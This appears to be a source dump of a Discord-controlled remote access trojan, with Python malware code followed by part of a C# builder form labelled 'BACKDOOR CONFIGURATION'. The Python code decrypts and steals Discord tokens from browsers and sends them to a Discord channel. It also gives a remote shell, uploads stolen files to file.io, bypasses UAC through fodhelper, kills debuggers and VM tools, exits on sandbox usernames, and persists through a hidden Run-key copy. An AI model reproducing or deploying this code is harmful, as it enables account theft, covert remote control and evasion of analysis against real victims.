os.getenv("LOCALAPPDATA") 879 | ROAMING = os.getenv("APPDATA") 880 | PATHS = [ 881 | ROAMING + "\\Discord", 882 | ROAMING + "\\discordcanary", 883 | ROAMING + "\\discordptb", 884 | LOCAL + "\\Google\\Chrome\\User Data\\Default", 885 | LOCAL + "\\Google\\Chrome\\User Data\\Profile 1", 886 | LOCAL + "\\Google\\Chrome\\User Data\\Profile 2", 887 | LOCAL + "\\Google\\Chrome\\User Data\\Profile 3", 888 | LOCAL + "\\Google\\Chrome\\User Data\\Profile 4", 889 | LOCAL + "\\Google\\Chrome\\User Data\\Profile 5", 890 | ROAMING + "\\Opera Software\\Opera Stable", 891 | LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default", 892 | LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default", 893 | ROAMING + "\\Opera Software\\Opera GX Stable\\" 894 | 895 | ] 896 | 897 | for path in reversed(PATHS): 898 | if not os.path.exists(path): 899 | PATHS.remove(path) 900 | 901 | regex1 = "[\\w-]{24}\.[\\w-]{6}\\.[\\w-]{27}" 902 | regex2 = r"mfa\\.[\\w-]{84}" 903 | encrypted_regex = "dQw4w9WgXcQ:[^.*\\['(.*)'\\].*$]{120}" 904 | 905 | def getheaders(token=None, content_type="application/json"): 906 | headers = { 907 | "Content-Type": content_type, 908 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11" 909 | } 910 | if token: 911 | headers.update({"Authorization": token}) 912 | return headers 913 | 914 | def decrypt_payload(cipher, payload): 915 | return cipher.decrypt(payload) 916 | 917 | def generate_cipher(aes_key, iv): 918 | return AES.new(aes_key, AES.MODE_GCM, iv) 919 | 920 | def decrypt_token(buff, master_key): 921 | try: 922 | iv = buff[3:15] 923 | payload = buff[15:] 924 | cipher = generate_cipher(master_key, iv) 925 | decrypted_pass = decrypt_payload(cipher, payload) 926 | decrypted_pass = decrypted_pass[:-16].decode() 927 | return decrypted_pass 928 | except Exception: 929 | return "Couldn't decrypt token" 930 | 931 | def get_master_key(path): 932 | with open(path, "r", encoding="utf-8") as f: 933 | local_state = f.read() 934 | local_state = json.loads(local_state) 935 | 936 | master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"]) 937 | master_key = master_key[5:] 938 | master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1] 939 | return master_key 940 | 941 | def gettokens(path): 942 | path1=path 943 | path += "\\Local Storage\\leveldb" 944 | tokens = [] 945 | try: 946 | if not "discord" in path.lower(): 947 | for file_name in os.listdir(path): 948 | if not file_name.endswith('.log') and not file_name.endswith('.ldb'): 949 | continue 950 | for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]: 951 | for token in findall(regex1, line): 952 | try: 953 | r = requests.get("https://discord.com/api/v9/users/@me", headers=getheaders(token)) 954 | if r.status_code == 200: 955 | if token in tokens: 956 | continue 957 | except Exception: 958 | continue 959 | tokens.append(token) 960 | for token in findall(regex2, line): 961 | print(token) 962 | try: 963 | r = requests.get("https://discord.com/api/v9/users/@me", headers=getheaders(token)) 964 | if r.status_code == 200: 965 | if token in tokens: 966 | continue 967 | except Exception: 968 | continue 969 | tokens.append(token) 970 | else: 971 | for file_name in os.listdir(path): 972 | if not file_name.endswith('.log') and not file_name.endswith('.ldb'): 973 | continue 974 | for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]: 975 | for y in findall(encrypted_regex, line): 976 | token = decrypt_token(base64.b64decode(y.split('dQw4w9WgXcQ:')[1]), get_master_key(path1 + '\\Local State')) 977 | try: 978 | r = requests.get("https://discord.com/api/v9/users/@me", headers=getheaders(token)) 979 | if r.status_code == 200: 980 | if token in tokens: 981 | continue 982 | tokens.append(token) 983 | 984 | except: 985 | continue 986 | return tokens 987 | except Exception as e: 988 | return [] 989 | all_tokens=[] 990 | for path_grab in PATHS: 991 | if os.path.exists(path_grab): 992 | for token in gettokens(path_grab): 993 | all_tokens.append(f"`{path_grab}` - **{token}**") 994 | return str(all_tokens).replace("[", "").replace("]", "").replace("'", "").replace(",", "") 995 | 996 | @client.command() 997 | async def grabdiscord(ctx, *, usid): 998 | if usid == clientid: 999 | postchannel = client.get_channel(int(tokens_channel_id)) 1000 | await ctx.send(f":skull_crossbones: Searching for **{os.getlogin()}**'s account tokens...") 1001 | await postchannel.send(f"{ctx.author.mention} Account tokens for **{os.getlogin()}** : \n\n{token_grab()}") 1002 | await ctx.send(f":white_check_mark: **{os.getlogin()}**'s account tokens have been sent in <#{tokens_channel_id}>") 1003 | 1004 | 1005 | @client.command() 1006 | async def chdir(ctx, usid, *, directory): 1007 | if usid == clientid: 1008 | if directory != "<": 1009 | try: 1010 | os.chdir(f"{os.getcwd()}\\{directory}") 1011 | await ctx.send(f"Directory changed to **{directory}** for **{os.getlogin()}**") 1012 | except: await ctx.send(f"Error accessing directory for **{os.getlogin()}**") 1013 | elif directory == "<": 1014 | try: 1015 | os.chdir('..') 1016 | await ctx.send(f"Moved one directory back for **{os.getlogin()}** -> **{os.getcwd()}**") 1017 | except: await ctx.send(f"Error moving one directory back for **{os.getlogin()}**") 1018 | 1019 | @client.command() 1020 | async def ls(ctx, *, usid): 1021 | if usid == clientid: 1022 | output = subprocess.getoutput('dir') 1023 | if output: 1024 | result = output 1025 | numb = len(result) 1026 | if numb < 1: 1027 | await ctx.send(f"Error displaying current directory for **{os.getlogin()}**.") 1028 | elif numb > 1: 1029 | temp = (os.getenv('TEMP')) 1030 | if os.path.isfile(temp + r"\output22.txt"): 1031 | os.system(r"del %temp%\output22.txt /f") 1032 | f1 = open(temp + r"\output22.txt", 'a') 1033 | f1.write(result) 1034 | f1.close() 1035 | file = discord.File(temp + r"\output22.txt", filename="output22.txt") 1036 | await ctx.send(f"Current directory items for **{os.getlogin()}**:\n\n-", file=file) 1037 | else: 1038 | await ctx.send(f"Current directory items for **{os.getlogin()}**:\n\n" + result) 1039 | 1040 | @client.command() 1041 | async def download(ctx, usid, *, path): 1042 | if usid == clientid: 1043 | try: 1044 | filename = path 1045 | check2 = os.stat(filename).st_size 1046 | except: await ctx.send(f"File path doesn't exist.") 1047 | if check2 > 7340032: 1048 | try: 1049 | await ctx.send(f"Please wait while downloading the file from **{os.getlogin()}**...") 1050 | response = requests.post('https://file.io/', files={"file": open(filename, "rb")}).json()["link"] 1051 | await ctx.send(f"Success downloading file from **{os.getlogin()}**. Download link : {response}") 1052 | except: await ctx.send(f"Access denied.") 1053 | else: 1054 | try: 1055 | file = discord.File(path, filename=path) 1056 | await ctx.send(f"Success downloading file from **{os.getlogin()}**.", file=file) 1057 | except: await ctx.send(f"Access denied.") 1058 | 1059 | @client.command() 1060 | async def upload(ctx, usid, *, path): 1061 | if usid == clientid: 1062 | if ctx.message.attachments: 1063 | try: 1064 | await ctx.message.attachments[0].save(path) 1065 | await ctx.send(f"Saved attachment for **{os.getlogin()}** in **{path}**") 1066 | except WindowsError as e: 1067 | await ctx.send(f"System error uploading attachment in **{path}** for **{os.getlogin()}**") 1068 | 1069 | @client.command() 1070 | async def bypass_uac(ctx, *, usid): 1071 | if usid == clientid: 1072 | def isAdmin(): 1073 | try: 1074 | is_admin = (os.getuid() == 0) 1075 | except AttributeError: 1076 | is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0 1077 | return is_admin 1078 | if isAdmin(): 1079 | await ctx.send(f"You already have admin privileges against **{os.getlogin()}**!") 1080 | else: 1081 | class disable_fsr(): 1082 | disable = ctypes.windll.kernel32.Wow64DisableWow64FsRedirection 1083 | revert = ctypes.windll.kernel32.Wow64RevertWow64FsRedirection 1084 | def __enter__(self): 1085 | self.old_value = ctypes.c_long() 1086 | self.success = self.disable(ctypes.byref(self.old_value)) 1087 | def __exit__(self, type, value, traceback): 1088 | if self.success: 1089 | self.revert(self.old_value) 1090 | await ctx.send(f"Started UAC Bypass process on **{os.getlogin()}**") 1091 | isexe=False 1092 | if (sys.argv[0].endswith("exe")): 1093 | isexe=True 1094 | if not isexe: 1095 | test_str = sys.argv[0] 1096 | current_dir = inspect.getframeinfo(inspect.currentframe()).filename 1097 | cmd2 = current_dir 1098 | create_reg_path = """ powershell New-Item "HKCU:\SOFTWARE\Classes\ms-settings\Shell\Open\command" -Force """ 1099 | os.system(create_reg_path) 1100 | create_trigger_reg_key = """ powershell New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "hi" -Force """ 1101 | os.system(create_trigger_reg_key) 1102 | create_payload_reg_key = """powershell Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "`(Default`)" -Value "'cmd /c start python """ + '""' + '"' + '"' + cmd2 + '""' + '"' + '"\'"' + """ -Force""" 1103 | os.system(create_payload_reg_key) 1104 | else: 1105 | test_str = sys.argv[0] 1106 | current_dir = test_str 1107 | cmd2 = current_dir 1108 | create_reg_path = """ powershell New-Item "HKCU:\SOFTWARE\Classes\ms-settings\Shell\Open\command" -Force """ 1109 | os.system(create_reg_path) 1110 | create_trigger_reg_key = """ powershell New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "hi" -Force """ 1111 | os.system(create_trigger_reg_key) 1112 | create_payload_reg_key = """powershell Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "`(Default`)" -Value "'cmd /c start """ + '""' + '"' + '"' + cmd2 + '""' + '"' + '"\'"' + """ -Force""" 1113 | os.system(create_payload_reg_key) 1114 | with disable_fsr(): 1115 | os.system("fodhelper.exe") 1116 | remove_reg = """ powershell Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force """ 1117 | os.system(remove_reg) 1118 | 1119 | @client.command() 1120 | async def startfile(ctx, usid, *, filepath): 1121 | if usid == clientid: 1122 | try: 1123 | os.startfile(filepath) 1124 | await ctx.send(f"**{filepath}** has been executed for **{os.getlogin()}**.") 1125 | except WindowsError as e: 1126 | await ctx.send(f"**{filepath}** cannot be executed for **{os.getlogin()}**.") 1127 | 1128 | @client.command() 1129 | async def tasklist(ctx, *, usid): 1130 | if usid == clientid: 1131 | if 1==1: 1132 | result = subprocess.getoutput("tasklist") 1133 | numb = len(result) 1134 | if numb < 1: 1135 | await ctx.send(f"Error displaying active tasks for **{os.getlogin()}**") 1136 | elif numb > 1990: 1137 | temp = (os.getenv('TEMP')) 1138 | if os.path.isfile(temp + r"\olist.txt"): 1139 | os.system(r"del %temp%\olist.txt /f") 1140 | f1 = open(temp + r"\olist.txt", 'a') 1141 | f1.write(result) 1142 | f1.close() 1143 | file = discord.File(temp + r"\olist.txt", filename="olist.txt") 1144 | await ctx.send(f"Active tasks for **{os.getlogin()}** :", file=file) 1145 | else: 1146 | await ctx.send(f"Active tasks for **{os.getlogin()}** : " + result) 1147 | 1148 | @client.command() 1149 | async def taskkill(ctx, usid, *, proc): 1150 | if usid == clientid: 1151 | kilproc = r"taskkill /IM" + ' "' + proc + '" ' + r"/f" 1152 | os.system(kilproc) 1153 | process_name = proc 1154 | call = 'TASKLIST', '/FI', 'imagename eq %s' % process_name 1155 | output = subprocess.check_output(call).decode() 1156 | last_line = output.strip().split('\r\n')[-1] 1157 | done = (last_line.lower().startswith(process_name.lower())) 1158 | if done == False: 1159 | await ctx.send(f"Killed the **{proc}** task for **{os.getlogin()}**") 1160 | elif done == True: 1161 | await ctx.send(f"Error killing the **{proc}** task for **{os.getlogin()}**") 1162 | 1163 | @client.command() 1164 | async def delfile(ctx, usid, *, filepath): 1165 | if usid == clientid: 1166 | try: 1167 | if os.path.exists(filepath): 1168 | if os.path.isdir(filepath): 1169 | shutil.rmtree(filepath) 1170 | await ctx.send(f"Deleted directory **{filepath}** from **{os.getlogin()}**") 1171 | return 1172 | os.remove(filepath) 1173 | await ctx.send(f"Deleted file **{filepath}** from **{os.getlogin()}**") 1174 | except WindowsError as e: 1175 | await ctx.send(f"System error trying to delete **{filepath}** from **{os.getlogin()}**") 1176 | 1177 | @client.command() 1178 | async def setwp(ctx, *, usid): 1179 | if usid == clientid: 1180 | path = os.path.join(os.getenv('TEMP') + r"\temp.jpg") 1181 | await ctx.message.attachments[0].save(path) 1182 | ctypes.windll.user32.SystemParametersInfoW(20, 0, path , 0) 1183 | await ctx.send(f"Changed wallpaper for **{os.getlogin()}**") 1184 | 1185 | @client.command() 1186 | async def critproc(ctx, *, usid): 1187 | if usid == clientid: 1188 | is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0 1189 | if is_admin == True: 1190 | ctypes.windll.ntdll.RtlAdjustPrivilege(20, 1, 0, ctypes.byref(ctypes.c_bool())) 1191 | ctypes.windll.ntdll.RtlSetProcessIsCritical(1, 0, 0) == 0 1192 | await ctx.send(f"Successfully set the task to a critical process for **{os.getlogin()}**.") 1193 | else: 1194 | await ctx.send(f"Insufficient permissions to critproc for **{os.getlogin()}**") 1195 | 1196 | @client.command() 1197 | async def hidefile(ctx, usid, *, filepath): 1198 | if usid == clientid: 1199 | try: 1200 | p = os.popen('attrib +h ' + filepath) 1201 | t = p.read() 1202 | p.close() 1203 | await ctx.send(f"**{filepath}** has been hidden for **{os.getlogin()}**") 1204 | except: 1205 | await ctx.send(f"Error hiding **{filepath}** for **{os.getlogin()}**") 1206 | 1207 | @client.command() 1208 | async def unhidefile(ctx, usid, *, filepath): 1209 | if usid == clientid: 1210 | try: 1211 | p = os.popen('attrib -h ' + filepath) 1212 | t = p.read() 1213 | p.close() 1214 | await ctx.send(f"**{filepath}** is now visible for **{os.getlogin()}**") 1215 | except: 1216 | await ctx.send(f"Error returning **{filepath}** to visible for **{os.getlogin()}**") 1217 | 1218 | @client.command() 1219 | async def key_press(ctx, usid, *, keyname): 1220 | if usid == clientid: 1221 | try: 1222 | pyautogui.press(keyname) 1223 | await ctx.send(f"**{os.getlogin()}** has pressed the **{keyname}** key.") 1224 | except: await ctx.send(f"**{keyname}** is not recognized as a key.") 1225 | 1226 | @client.command() 1227 | async def screenflip(ctx, *, usid): 1228 | if usid == clientid: 1229 | try: 1230 | screen = rs.get_primary_display() 1231 | start_pos = screen.current_orientation 1232 | pos = abs((start_pos - 1*90) % 360) 1233 | screen.rotate_to(pos) 1234 | await ctx.send(f"**{os.getlogin()}**'s screen has been flipped.") 1235 | except: await ctx.send(f"**{os.getlogin()}**'s screen could not be flipped.") 1236 | 1237 | @client.command() 1238 | async def hardware_list(ctx, *, usid): 1239 | if usid == clientid: 1240 | message = "" 1241 | message += f"`CPU`: **{psutil.cpu_count()}** cores\n" 1242 | message += f"`RAM`: **{psutil.virtual_memory().total / (1024.0 ** 3)}** GB\n" 1243 | message += f"`Hard disk`: **{psutil.disk_usage('/').total / (1024.0 ** 3)}** GB\n" 1244 | message += f"`Boot device`: {psutil.disk_partitions()[0].device}" 1245 | await ctx.send(f"Hardware information for **{os.getlogin()}**: \n\n{message}") 1246 | 1247 | @client.command() 1248 | async def chdisk(ctx, usid, *, disk): 1249 | if usid == clientid: 1250 | try: 1251 | os.chdir(disk) 1252 | await ctx.send(f"Disk changed to **{disk}** for **{os.getlogin()}**") 1253 | except: await ctx.send(f"Error changing disk to **{disk}** for **{os.getlogin()}**") 1254 | 1255 | @client.command() 1256 | async def restart(ctx, *, usid): 1257 | if usid == clientid: 1258 | await ctx.send(f"**{os.getlogin()}**'s PC has been shut down.") 1259 | os.system("shutdown /r /t 1") 1260 | 1261 | @client.command() 1262 | async def hidetaskbar(ctx, *, usid): 1263 | if usid == clientid: 1264 | try: 1265 | h = ctypes.windll.user32.FindWindowA(b'Shell_TrayWnd', None) 1266 | ctypes.windll.user32.ShowWindow(h, 0) 1267 | await ctx.send(f"**{os.getlogin()}**'s taskbar has been hidden.") 1268 | except: await ctx.send(f"**{os.getlogin()}**'s taskbar could not be hidden.") 1269 | 1270 | @client.command() 1271 | async def showtaskbar(ctx, *, usid): 1272 | if usid == clientid: 1273 | try: 1274 | h = ctypes.windll.user32.FindWindowA(b'Shell_TrayWnd', None) 1275 | ctypes.windll.user32.ShowWindow(h, 9) 1276 | await ctx.send(f"**{os.getlogin()}**'s taskbar has been returned.") 1277 | except: await ctx.send(f"**{os.getlogin()}**'s taskbar couldn't be returned.") 1278 | 1279 | @client.command() 1280 | async def shell(ctx, usid, *, command=""): 1281 | if usid == clientid: 1282 | if command != "": 1283 | try: 1284 | output = os.popen(command).read() 1285 | if len(output) > 2000: 1286 | temp_file = os.path.join(os.getenv('TEMP'), 'output.txt') 1287 | with open(temp_file, 'w') as file: 1288 | file.write(output) 1289 | await ctx.send('Output is too long. Sending as a file.', file=discord.File(temp_file)) 1290 | os.remove(temp_file) 1291 | else: 1292 | if output != "": 1293 | await ctx.send(f'Shell output for **{os.getlogin()}**:\n```{output}```') 1294 | else: 1295 | await ctx.send(f'Output empty for **{os.getlogin()}**') 1296 | except Exception as e: 1297 | await ctx.send(f'An error occurred: {str(e)}') 1298 | else: 1299 | await ctx.send(f"Please input a shell command for **{os.getlogin()}**") 1300 | 1301 | 1302 | def mainfunc(): 1303 | bluser = ('wdagutilityaccount', 'abby', 'peter wilson', 'hmarc', 'patex', 'john-pc', 'rdhj0cnfevzx', 'keecfmwgj', 'frank', '8nl0colnq5bq', 'lisa', 'john', 'george', 'pxmduopvyx', '8vizsm', 'w0fjuovmccp5a', 'lmvwjj9b', 'pqonjhvwexss', '3u2v9m8', 'julia', 'heuerzl', 'harry johnson', 'j.seance', 'a.monaldo', 'tvm') 1304 | bltask = ('vm3dservice', 'fakenet', 'dumpcap', 'httpdebuggerui', 'wireshark', 'fiddler', 'vboxservice', 'df5serv', 'vboxtray', 'vmtoolsd', 'vmwaretray', 'ida64', 'ollydbg', 'pestudio', 'vmwareuser', 'vgauthservice', 'vmacthlp', 'x96dbg', 'vmsrvc', 'x32dbg', 'vmusrvc', 'prl_cc', 'prl_tools', 'xenservice', 'qemu-ga', 'joeboxcontrol', 'ksdumperclient', 'ksdumper', 'joeboxserver', 'vmwareservice', 'vmwaretray', 'discordtokenprotector', 'processhacker') 1305 | 1306 | if hide_after_exec != False: 1307 | p = os.popen('attrib +h "' + sys.executable + '"') 1308 | p.close() 1309 | 1310 | if antivm != False: 1311 | result = subprocess.getoutput("tasklist") 1312 | numb = len(result) 1313 | if numb > 0: 1314 | temp = (os.getenv('TEMP')) 1315 | if os.path.isfile(temp + r"\olist.txt"): 1316 | os.system(r"del %temp%\olist.txt /f") 1317 | f1 = open(temp + r"\olist.txt", 'a') 1318 | f1.write(result) 1319 | f1.close() 1320 | final = "" 1321 | with open(f"{os.getenv('TEMP')}\olist.txt") as A: 1322 | final = A.read().lower() 1323 | for task in bltask: 1324 | if task in final: 1325 | try: 1326 | kilproc = r"taskkill /IM" + ' "' + task + '.exe' + '" ' + r"/f" 1327 | os.system(kilproc) 1328 | except: sys.exit(0) 1329 | 1330 | os.remove(f"{temp}\olist.txt") 1331 | 1332 | if f"{os.getlogin()}".lower() in bluser: 1333 | sys.exit(0) 1334 | 1335 | if autostart != False: 1336 | if sys.argv[0].endswith("exe"): 1337 | if not os.path.exists(backdoor_location): 1338 | shutil.copyfile(sys.executable, backdoor_location) 1339 | key_path = r"Software\Microsoft\Windows\CurrentVersion\Run" 1340 | command = 'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v visuals /t REG_SZ /d "' + backdoor_location + '" /f' 1341 | key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, key_path, 0, winreg.KEY_SET_VALUE) 1342 | winreg.SetValueEx(key, "visuals", 0, winreg.REG_SZ, command) 1343 | winreg.CloseKey(key) 1344 | subprocess.call(command, shell=True) 1345 | p = os.popen('attrib +h "' + backdoor_location + '"') 1346 | p.close() 1347 | if not sys.argv[0].endswith(process_name): 1348 | os.startfile(backdoor_location) 1349 | os._exit(0) 1350 | 1351 | 1352 | 1353 | if __name__ == '__main__': 1354 | mainfunc() 1355 | 1356 | client.run(token) 1357 | -------------------------------------------------------------------------------- /App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Form1.Designer.cs: -------------------------------------------------------------------------------- 1 | namespace aphrobyte_discord_rat 2 | { 3 | partial class Form1 4 | { 5 | /// 6 | /// Required designer variable. 7 | /// 8 | private System.ComponentModel.IContainer components = null; 9 | 10 | /// 11 | /// Clean up any resources being used. 12 | /// 13 | /// true if managed resources should be disposed; otherwise, false. 14 | protected override void Dispose(bool disposing) 15 | { 16 | if (disposing && (components != null)) 17 | { 18 | components.Dispose(); 19 | } 20 | base.Dispose(disposing); 21 | } 22 | 23 | #region Windows Form Designer generated code 24 | 25 | /// 26 | /// Required method for Designer support - do not modify 27 | /// the contents of this method with the code editor. 28 | /// 29 | private void InitializeComponent() 30 | { 31 | System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(Form1)); 32 | this.pictureBox1 = new System.Windows.Forms.PictureBox(); 33 | this.textBox1 = new System.Windows.Forms.TextBox(); 34 | this.label1 = new System.Windows.Forms.Label(); 35 | this.label2 = new System.Windows.Forms.Label(); 36 | this.textBox2 = new System.Windows.Forms.TextBox(); 37 | this.label3 = new System.Windows.Forms.Label(); 38 | this.textBox3 = new System.Windows.Forms.TextBox(); 39 | this.panel1 = new System.Windows.Forms.Panel(); 40 | this.label4 = new System.Windows.Forms.Label(); 41 | this.label5 = new System.Windows.Forms.Label(); 42 | this.panel2 = new System.Windows.Forms.Panel(); 43 | this.checkBox4 = new System.Windows.Forms.CheckBox(); 44 | this.checkBox2 = new System.Windows.Forms.CheckBox(); 45 | this.checkBox1 = new System.Windows.Forms.CheckBox(); 46 | this.textBox5 = new System.Windows.Forms.TextBox(); 47 | this.label7 = new System.Windows.Forms.Label(); 48 | this.label8 = new System.Windows.Forms.Label(); 49 | this.comboBox1 = new System.Windows.Forms.ComboBox(); 50 | this.label6 = new System.Windows.Forms.Label(); 51 | this.textBox4 = new System.Windows.Forms.TextBox(); 52 | this.button1 = new System.Windows.Forms.Button(); 53 | this.button2 = new System.Windows.Forms.Button(); 54 | this.checkBox5 = new System.Windows.Forms.CheckBox(); 55 | this.pictureBox2 = new System.Windows.Forms.PictureBox(); 56 | this.label9 = new System.Windows.Forms.Label(); 57 | ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit(); 58 | this.panel1.SuspendLayout(); 59 | this.panel2.SuspendLayout(); 60 | ((System.ComponentModel.ISupportInitialize)(this.pictureBox2)).BeginInit(); 61 | this.SuspendLayout(); 62 | // 63 | // pictureBox1 64 | // 65 | this.pictureBox1.Dock = System.Windows.Forms.DockStyle.Top; 66 | this.pictureBox1.Image = ((System.Drawing.Image)(resources.GetObject("pictureBox1.Image"))); 67 | this.pictureBox1.Location = new System.Drawing.Point(0, 0); 68 | this.pictureBox1.Name = "pictureBox1"; 69 | this.pictureBox1.Size = new System.Drawing.Size(799, 98); 70 | this.pictureBox1.SizeMode = System.Windows.Forms.PictureBoxSizeMode.Zoom; 71 | this.pictureBox1.TabIndex = 0; 72 | this.pictureBox1.TabStop = false; 73 | // 74 | // textBox1 75 | // 76 | this.textBox1.Font = new System.Drawing.Font("Microsoft Sans Serif", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 77 | this.textBox1.Location = new System.Drawing.Point(138, 30); 78 | this.textBox1.Name = "textBox1"; 79 | this.textBox1.Size = new System.Drawing.Size(169, 20); 80 | this.textBox1.TabIndex = 1; 81 | // 82 | // label1 83 | // 84 | this.label1.AutoSize = true; 85 | this.label1.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 86 | this.label1.ForeColor = System.Drawing.SystemColors.ButtonFace; 87 | this.label1.Location = new System.Drawing.Point(11, 34); 88 | this.label1.Name = "label1"; 89 | this.label1.Size = new System.Drawing.Size(54, 16); 90 | this.label1.TabIndex = 2; 91 | this.label1.Text = "Guild ID"; 92 | // 93 | // label2 94 | // 95 | this.label2.AutoSize = true; 96 | this.label2.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 97 | this.label2.ForeColor = System.Drawing.SystemColors.ButtonFace; 98 | this.label2.Location = new System.Drawing.Point(11, 73); 99 | this.label2.Name = "label2"; 100 | this.label2.Size = new System.Drawing.Size(63, 16); 101 | this.label2.TabIndex = 4; 102 | this.label2.Text = "Bot token"; 103 | // 104 | // textBox2 105 | // 106 | this.textBox2.Font = new System.Drawing.Font("Microsoft Sans Serif", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 107 | this.textBox2.Location = new System.Drawing.Point(138, 69); 108 | this.textBox2.Name = "textBox2"; 109 | this.textBox2.Size = new System.Drawing.Size(169, 20); 110 | this.textBox2.TabIndex = 3; 111 | // 112 | // label3 113 | // 114 | this.label3.AutoSize = true; 115 | this.label3.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 116 | this.label3.ForeColor = System.Drawing.SystemColors.ButtonFace; 117 | this.label3.Location = new System.Drawing.Point(11, 112); 118 | this.label3.Name = "label3"; 119 | this.label3.Size = new System.Drawing.Size(107, 16); 120 | this.label3.TabIndex = 6; 121 | this.label3.Text = "Alerts channel ID"; 122 | // 123 | // textBox3 124 | // 125 | this.textBox3.Font = new System.Drawing.Font("Microsoft Sans Serif", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 126 | this.textBox3.Location = new System.Drawing.Point(138, 108); 127 | this.textBox3.Name = "textBox3"; 128 | this.textBox3.Size = new System.Drawing.Size(169, 20); 129 | this.textBox3.TabIndex = 5; 130 | // 131 | // panel1 132 | // 133 | this.panel1.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(40)))), ((int)(((byte)(40)))), ((int)(((byte)(40))))); 134 | this.panel1.Controls.Add(this.textBox1); 135 | this.panel1.Controls.Add(this.label3); 136 | this.panel1.Controls.Add(this.label1); 137 | this.panel1.Controls.Add(this.textBox3); 138 | this.panel1.Controls.Add(this.textBox2); 139 | this.panel1.Controls.Add(this.label2); 140 | this.panel1.Location = new System.Drawing.Point(12, 155); 141 | this.panel1.Name = "panel1"; 142 | this.panel1.Size = new System.Drawing.Size(320, 169); 143 | this.panel1.TabIndex = 7; 144 | // 145 | // label4 146 | // 147 | this.label4.AutoSize = true; 148 | this.label4.Font = new System.Drawing.Font("Microsoft Sans Serif", 18F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 149 | this.label4.ForeColor = System.Drawing.SystemColors.ButtonFace; 150 | this.label4.Location = new System.Drawing.Point(33, 123); 151 | this.label4.Name = "label4"; 152 | this.label4.Size = new System.Drawing.Size(271, 29); 153 | this.label4.TabIndex = 7; 154 | this.label4.Text = "BOT CONFIGURATION"; 155 | // 156 | // label5 157 | // 158 | this.label5.AutoSize = true; 159 | this.label5.Font = new System.Drawing.Font("Microsoft Sans Serif", 18F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 160 | this.label5.ForeColor = System.Drawing.SystemColors.ButtonFace; 161 | this.label5.Location = new System.Drawing.Point(397, 123); 162 | this.label5.Name = "label5"; 163 | this.label5.Size = new System.Drawing.Size(356, 29); 164 | this.label5.TabIndex = 8; 165 | this.label5.Text = "BACKDOOR CONFIGURATION"; 166 | // 167 | // panel2 168 | // 169 | this.panel2.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(40)))), ((int)(((byte)(40)))), ((int)(((byte)(40))))); 170 | this.panel2.Controls.Add(this.checkBox4); 171 | this.panel2.Controls.Add(this.checkBox2); 172 | this.panel2.Controls.Add(this.checkBox1); 173 | this.panel2.Controls.Add(this.textBox5); 174 | this.panel2.Controls.Add(this.label7); 175 | this.panel2.Controls.Add(this.label8); 176 | this.panel2.Controls.Add(this.comboBox1); 177 | this.panel2.Controls.Add(this.label6); 178 | this.panel2.Controls.Add(this.textBox4); 179 | this.panel2.Location = new System.Drawing.Point(351, 155); 180 | this.panel2.Name = "panel2"; 181 | this.panel2.Size = new System.Drawing.Size(437, 275); 182 | this.panel2.TabIndex = 9; 183 | // 184 | // checkBox4 185 | // 186 | this.checkBox4.AutoSize = true; 187 | this.checkBox4.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F); 188 | this.checkBox4.ForeColor = System.Drawing.SystemColors.ButtonFace; 189 | this.checkBox4.Location = new System.Drawing.Point(117, 164); 190 | this.checkBox4.Name = "checkBox4"; 191 | this.checkBox4.Size = new System.Drawing.Size(144, 20); 192 | this.checkBox4.TabIndex = 17; 193 | this.checkBox4.Text = "Hide after execution"; 194 | this.checkBox4.UseVisualStyleBackColor = true; 195 | // 196 | // checkBox2 197 | // 198 | this.checkBox2.AutoSize = true; 199 | this.checkBox2.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F); 200 | this.checkBox2.ForeColor = System.Drawing.SystemColors.ButtonFace; 201 | this.checkBox2.Location = new System.Drawing.Point(117, 138); 202 | this.checkBox2.Name = "checkBox2"; 203 | this.checkBox2.Size = new System.Drawing.Size(135, 20); 204 | this.checkBox2.TabIndex = 15; 205 | this.checkBox2.Text = "Anti VM / Sandbox"; 206 | this.checkBox2.UseVisualStyleBackColor = true; 207 | // 208 | // checkBox1 209 | // 210 | this.checkBox1.AutoSize = true; 211 | 